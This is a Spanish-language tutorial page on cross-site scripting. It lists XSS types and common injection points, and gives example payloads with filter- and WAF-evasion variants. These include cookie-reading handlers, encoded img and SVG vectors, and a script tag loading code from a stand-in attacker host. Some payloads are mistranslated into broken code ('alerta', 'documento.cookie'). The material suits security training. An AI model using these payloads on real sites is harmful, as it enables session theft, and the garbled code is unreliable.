XSS Injection

Encontrar las vulnerabilidades xss se logran mediante los siguientes tipos de ataques:

1. Reflejado (Reflected XSS)

2. Persistente (Stored XSS)

3. Basado en DOM (DOM-based XSS)

Normalmente encontrará vulnerabilidades XSS en la siguiente ubicaciones:

• Campos de búsqueda que hacen eco de una cadena de búsqueda al usuario

• encabezados HTTP

• Campos de entrada que reflejan los datos del usuario

• Mensajes de error que devuelven texto proporcionado por el usuario

• Campos ocultos que pueden incluir datos ingresados ​​por el usuario.

• Aplicaciones que muestran datos proporcionados por el usuario

Desde la barra de direcciones de un navegador:

  javascript:alert("Prueba Omar_s_XSS"); javascript:alerta(documento.cookie);

Un campo de entrada del usuario en un formulario web:

<script>alerta("Prueba XSS")</script>

XSS Evasion Techniques

Se pueden utilizar numerosas técnicas para evadir las protecciones XSS y los productos de seguridad, como los firewalls de aplicaciones web (WAF).

Una inyección de JavaScript XSS que sería detectada por la mayoría de los filtros XSS y soluciones de seguridad:

<SCRIPT SRC=http://malicious.h4cker.org/xss.js></SCRIPT>

La etiqueta HTML img se puede utilizar de varias maneras para evadir potencialmente los filtros XSS:

<img src="javascript:alert('xss');"> <img src=javascript:alert('xss')> <img src=javascript:alert("XSS")> <img src=javascript:alert ('xs')>

También es posible utilizar otras etiquetas HTML maliciosas, como se demuestra aquí:

  <a onmouseover="alert(document.cookie)">Este es un enlace malicioso</a> <a onmouseover=alert(document.cookie)>Este es un enlace malicioso</a>

Un atacante también puede utilizar una combinación de referencias de caracteres HTML hexadecimales para evadir potencialmente los filtros XSS, como se demuestra aquí:

  <img src=javascript& #x3Aalert('XSS' x29>

La codificación US ASCII puede eludir muchos filtros de contenido y también puede usarse como técnica de evasión, pero solo funciona si el sistema transmite en codificación US ASCII o si se configura manualmente. Esta técnica es útil contra WAF. El siguiente ejemplo demuestra el uso de la codificación ASCII de EE. UU. para evadir WAF:

¼script¾alerta(¢XSS¢)¼/script¾

El siguiente ejemplo muestra un ejemplo de una técnica de evasión que implica el uso de etiquetas de inserción HTML para incrustar un archivo de gráficos vectoriales escalables (SVG):

  <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcm cvMjAwMC9zdmciIHhtbG5zOnhsa W5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3 hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaW dodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU 9InRleHQvZWNtYXNjcmlwdC I+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" tipo="image/svg+xml" AllowScriptAccess="always"></EMBED>

Recursos

XSS Filter Evasion - OWASP Cheat Sheet Seriescheatsheetseries.owasp.org

https://github.com/The-Art-of-Hacking/h4cker/blob/master/web_application_testing/xss_vectors.md

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy